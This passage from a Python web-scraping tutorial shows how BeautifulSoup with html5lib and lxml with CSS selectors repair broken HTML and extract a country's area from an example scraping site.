<li> Area <li> Population </li> </li> </ul> We can see that using the default html.parser did not result in properly parsed HTML. We can see from the previous snippet that it has used nested li elements, which might make it difficult to navigate. Luckily there are more options for parsers. We can install LXML or we can also use html5lib. To install html5lib, simply use pip: pip install html5lib Now, we can repeat this code, changing only the parser like so: >>> soup = BeautifulSoup(broken_html, 'html5lib') >>> fixed_html = soup.prettify() >>> print(fixed_html) <html> <head> </head> <body> <ul class="country"> <li> Area </li> <li> Population </li> </ul> </body> </html> Here, BeautifulSoup using html5lib was able to correctly interpret the missing attribute quotes and closing tags, as well as add the <html> and <body> tags to form a complete HTML document. You should see similar results if you used lxml. Now, we can navigate to the elements we want using the find() and find_all() methods: >>> ul = soup.find('ul', attrs={'class':'country'}) >>> ul.find('li') # returns just the first match <li>Area</li> >>> ul.find_all('li') # returns all matches [<li>Area</li>, <li>Population</li>] For a full list of available methods and parameters, the official documentation is available at http://www.crummy.com/software/BeautifulSoup/bs4/doc/. Now, using these techniques, here is a full example to extract the country area from our example website: >>> from bs4 import BeautifulSoup >>> url = 'http://example.webscraping.com/places/view/United-Kingdom-239' >>> html = download(url) >>> soup = BeautifulSoup(html) >>> # locate the area row >>> tr = soup.find(attrs={'id':'places_area__row'}) >>> td = tr.find(attrs={'class':'w2p_fw'}) # locate the data element >>> area = td.text # extract the text from the data element >>> print(area) 244,820 square kilometres This code is more verbose than regular expressions but easier to construct and understand. Also, we no longer need to worry about problems in minor layout changes, such as extra whitespace or tag attributes. We also know if the page contains broken HTML that BeautifulSoup can help clean the page and allow us to extract data from very broken website code. Lxml Lxml is a Python library built on top of the libxml2 XML parsing library written in C, which helps make it faster than Beautiful Soup but also harder to install on some computers, specifically Windows. The latest installation instructions are available at http://lxml.de/installation.html. If you run into difficulties installing the library on your own, you can also use Anaconda to do so: https://anaconda.org/anaconda/lxml. If you are unfamiliar with Anaconda, it is a package and environment manager primarily focused on open data science packages built by the folks at Continuum Analytics. You can download and install Anaconda by following their setup instructions here: https://www.continuum.io/downloads. Note that using the Anaconda quick install will set your PYTHON_PATH to the Conda installation of Python. As with Beautiful Soup, the first step when using lxml is parsing the potentially invalid HTML into a consistent format. Here is an example of parsing the same broken HTML: >>> from lxml.html import fromstring, tostring >>> broken_html = '<ul class=country><li>Area<li>Population</ul>' >>> tree = fromstring(broken_html) # parse the HTML >>> fixed_html = tostring(tree, pretty_print=True) >>> print(fixed_html) <ul class="country"> <li>Area</li> <li>Population</li> </ul> As with BeautifulSoup, lxml was able to correctly parse the missing attribute quotes and closing tags, although it did not add the <html> and <body> tags. These are not requirements for standard XML and so are unnecessary for lxml to insert. After parsing the input, lxml has a number of different options to select elements, such as XPath selectors and a find() method similar to Beautiful Soup. Instead, we will use CSS selectors here, because they are more compact and can be reused later when parsing dynamic content. Some readers will already be familiar with them from their experience with jQuery selectors or use in front-end web application development. We will compare performance of these selectors with XPath. To use CSS selectors, you might need to install the cssselect library like so: pip install cssselect Now we can use the lxml CSS selectors to extract the area data from the example page: >>> tree = fromstring(html) >>> td = tree.cssselect('tr#places_area__row > td.w2p_fw')[0] >>> area = td.text_content() >>> print(area) 244,820 square kilometres By using the cssselect method on our tree, we can utilize CSS syntax to select a table row element with the places_area__row ID, and then the child table data tag with the w2p_fw class. Since cssselect returns a list, we then index the first result and call the text_content method, which will iterate over all child elements and return concatenated text of each element. In this case, we only have one element, but this functionality is useful to know for more complex extraction examples. Summary We have walked through a variety of ways to scrape data from a web page. Regular expressions can be useful for a one-off scrape or to avoid the overhead of parsing the entire web page, and BeautifulSoup provides a high-level interface while avoiding any difficult dependencies. However, in general, lxml will be the best choice because of its speed and extensive functionality, so we will use it in future examples. Resources for Article: Further resources on this subject: Web scraping with Python (Part 2) [article] Scraping the Web with Python - Quick Start [article] Scraping the Data [article]

0
0
2431

Getting Started with Python and Machine Learning

To Optimize Scans

Getting Started with Ansible 2

Exploring Compilers

User Story Map – The First User Experience Map in a Product’s Life

Inbuilt Data Types in Python

Getting Started with Metasploit

Understanding Microservices

Tangled Web? Not At All!

String Encryption and Decryption

Trending Topics

Setting up Intel Edison

What are Microservices?

CORS in Node.js

Grouping Sets in Advanced SQL

Scraping a Web Page

Create a Free Account To Continue Reading

Sign in to activate your 7-day free access